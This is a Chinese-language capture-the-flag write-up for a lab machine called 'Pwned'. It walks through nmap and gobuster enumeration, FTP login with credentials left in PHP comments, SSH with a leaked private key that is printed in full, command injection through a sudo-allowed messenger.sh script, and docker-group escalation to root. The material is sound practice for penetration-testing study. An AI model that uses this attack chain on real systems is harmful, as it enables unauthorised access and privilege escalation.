社工(不是)
学习了docker提权
对信息收集有了更深的感悟
复习了sudo横向提权普通用户,shell脚本审计
了解了一段精彩的故事
nmap扫描
plain
┌──(kali㉿kali)-[~/pwned]
└─$ cat nmapscan/*.nmap
# Nmap 7.95 scan initiated Wed Jul 23 23:27:31 2025 as: /usr/lib/nmap/nmap --privileged -sT -sC -sV -O -p21,22,80 -oA nmapscan/detail 192.168.140.230
Nmap scan report for 192.168.140.230
Host is up (0.0020s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
| 256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
|_ 256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Pwned....!!
MAC Address: 08:00:27:E5:2A:A8 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul 23 23:27:41 2025 -- 1 IP address (1 host up) scanned in 10.10 seconds
# Nmap 7.95 scan initiated Thu Jul 24 02:23:56 2025 as: /usr/lib/nmap/nmap --privileged -p- -oA ports 192.168.140.230
Nmap scan report for 192.168.140.230
Host is up (0.0024s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:E5:2A:A8 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
# Nmap done at Thu Jul 24 02:24:14 2025 -- 1 IP address (1 host up) scanned in 18.53 seconds
# Nmap 7.95 scan initiated Wed Jul 23 23:30:21 2025 as: /usr/lib/nmap/nmap --privileged --script=vuln -p21,22,80 -oA nmapscan/vuln 192.168.140.230
Nmap scan report for 192.168.140.230
Host is up (0.0015s latency).
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|_ /robots.txt: Robots file
MAC Address: 08:00:27:E5:2A:A8 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
# Nmap done at Wed Jul 23 23:30:52 2025 -- 1 IP address (1 host up) scanned in 31.64 secondsftp尝试匿名访问失败
遂访问80端口
web渗透
页面中写道这位attacker利用企业员工成功hack服务器
查看源码:该attacker注释中写道:
plain
<!-- I forgot to add this on last note
You are pretty smart as i thought
so here i left it for you
She sings very well. l loved it -->应该是无效信息
刚才nmap脚本扫描提示有robots.txt
访问:
plain
# Group 1
User-agent: *
Allow: /nothing访问nothing
查看源码:
扫描目录,dirb没有扫出额外信息
使用gobuster扫描的很慢
当时gobuster扫了很久没扫出额外信息
其他能够看的地方也都看过了
一般这种时候,引用一位老师的一句话:
当我把所有的信息都,每个方向的信息都努力去尝试,
结果发现就是没有找到相关的利用点,
没有一个checkpot切入点
那么我认为就是信息收集的还不够
所以这里,只有非常耐心的等待gobuster扫完(感觉是扫的最久的一次)
扫出了hidden_text目录
访问,有一个secret.dic,写道
把这个复制或下载下来作为字典在爆破一次目录
plain
┌──(kali㉿kali)-[~/pwned]
└─$ gobuster dir -u http://192.168.140.230 -w dic.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.140.230
[+] Method: GET
[+] Threads: 10
[+] Wordlist: dic.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/pwned.vuln (Status: 301) [Size: 323] [--> http://192.168.140.230/pwned.vuln/]
Progress: 21 / 22 (95.45%)
===============================================================
Finished
===============================================================访问之后是一个登录界面
查看源码可以得到
plain
<?php
// if (isset($_POST['submit'])) {
// $un=$_POST['username'];
// $pw=$_POST['password'];
//
// if ($un=='ftpuser' && $pw=='B0ss_B!TcH') {
// echo "welcome"
// exit();
// }
// else
// echo "Invalid creds"
// }
?>这个参数值输入登录表单无响应
但是结合用户名为ftpuser,所以ftp尝试用这个用户密码连接
plain
┌──(kali㉿kali)-[~/pwned]
└─$ ftp 192.168.140.230
Connected to 192.168.140.230.
220 (vsFTPd 3.0.3)
Name (192.168.140.230:kali): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 连接成功
get所有能够获取的文件
plain
┌──(kali㉿kali)-[~/pwned]
└─$ ftp 192.168.140.230
Connected to 192.168.140.230.
220 (vsFTPd 3.0.3)
Name (192.168.140.230:kali): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||28433|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Jul 10 2020 share
226 Directory send OK.
ftp> cd share
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||63375|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 2602 Jul 09 2020 id_rsa
-rw-r--r-- 1 0 0 75 Jul 09 2020 note.txt
226 Directory send OK.
ftp> mget *
mget id_rsa [anpqy?]? y
229 Entering Extended Passive Mode (|||44380|)
150 Opening BINARY mode data connection for id_rsa (2602 bytes).
100% |******************************| 2602 641.66 KiB/s 00:00 ETA
226 Transfer complete.
2602 bytes received in 00:00 (273.22 KiB/s)
mget note.txt [anpqy?]? y
229 Entering Extended Passive Mode (|||43452|)
150 Opening BINARY mode data connection for note.txt (75 bytes).
100% |******************************| 75 26.11 KiB/s 00:00 ETA
226 Transfer complete.
75 bytes received in 00:00 (9.35 KiB/s)
ftp> cd ../
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||33346|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Jul 10 2020 share
226 Directory send OK.
ftp> cd ../
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||44849|)
150 Here comes the directory listing.
drwxrwx--- 4 1000 1000 4096 Jul 10 2020 ariana
drwxrwxrwx 3 0 0 4096 Jul 09 2020 ftpuser
-rwxr-xr-x 1 0 0 367 Jul 10 2020 messenger.sh
drwxrwx--- 4 1001 0 4096 Jul 24 14:02 selena
226 Directory send OK.
ftp> get messenger.sh
local: messenger.sh remote: messenger.sh
229 Entering Extended Passive Mode (|||7324|)
150 Opening BINARY mode data connection for messenger.sh (367 bytes).
100% |******************************| 367 88.47 KiB/s 00:00 ETA
226 Transfer complete.
367 bytes received in 00:00 (40.38 KiB/s)
ftp> quit
221 Goodbye.查看获取的文件
plain
┌──(kali㉿kali)-[~/pwned]
└─$ cat note.txt
Wow you are here
ariana won't happy about this note
sorry ariana :(
┌──(kali㉿kali)-[~/pwned]
└─$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----note.txt和id_rsa在ftp的一个目录下,这说明这个id_rsa很可能是ariana的
plain
┌──(kali㉿kali)-[~/pwned]
└─$ chmod 600 id_rsa
┌──(kali㉿kali)-[~/pwned]
└─$ ssh ariana@192.168.140.230 -i id_rsa
Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 24 14:51:38 2025 from 192.168.140.132
ariana@pwned:~$ 连接成功
此外还有一个文件messenger.sh,暂时还没用上
plain
┌──(kali㉿kali)-[~/pwned]
└─$ cat messenger.sh
#!/bin/bash
clear
echo "Welcome to linux.messenger "
echo ""
users=$(cat /etc/passwd | grep home | cut -d/ -f 3)
echo ""
echo "$users"
echo ""
read -p "Enter username to send message : " name
echo ""
read -p "Enter message for $name :" msg
echo ""
echo "Sending message to $name "
$msg 2> /dev/null
echo ""
echo "Message sent to $name :) "
echo ""可以注意到 $msg 2> /dev/null很有意思,它把我们输入的msg的内容作为命令输出
提权
枚举
plain
ariana@pwned:~$ sudo -l
Matching Defaults entries for ariana on pwned:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User ariana may run the following commands on pwned:
(selena) NOPASSWD: /home/messenger.sh可以无密码的以selena用户的身份执行
我们之前已经分析了messenger.sh可以执行你输入的命令
所以这里执行时以selena的身份可以打开一个shell
plain
ariana@pwned:~$ sudo -u selena /home/messenger.sh
plain
Welcome to linux.messenger
ariana:
selena:
ftpuser:
Enter username to send message : hhh
Enter message for hhh :bash
Sending message to hhh
id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
whoami
selena成功切换到selena用户,id看到docker
尝试docker提权
docker提权参考大佬文章:https://blog.csdn.net/nicai321/article/details/122266988
plain
Sending message to hhh
id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
whoami
selena
docker run -v /:/mnt -it alpine
/ # ls
bin etc lib mnt proc run srv tmp var
dev home media opt root sbin sys usr
/ # cd mnt
/mnt # cd root
/mnt/root # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/mnt/root # whoami
root
/mnt/root # ls
root.txt
/mnt/root # cat root.txt
4d4098d64e163d2726959455d046fd7c
You found me. i dont't expect this (◎ . ◎)
I am Ajay (Annlynn) i hacked your server left and this for you.
I trapped Ariana and Selena to takeover your server :)
You Pwned the Pwned congratulations :)
share the screen shot or flags to given contact details for confirmation
Telegram https://t.me/joinchat/NGcyGxOl5slf7_Xt0kTr7g
Instgarm ajs_walker
Twitter Ajs_walker
/mnt/root # (这里切换到selena交互性不太好,我最初试着在反弹了一次shell,这样docker提权好像是无法成功的,要在ssh切换后这个shell docker提权)
这里相当于把环境挂载到mnt里了,所以要注意cd mnt后是cd root不是/root不然没东西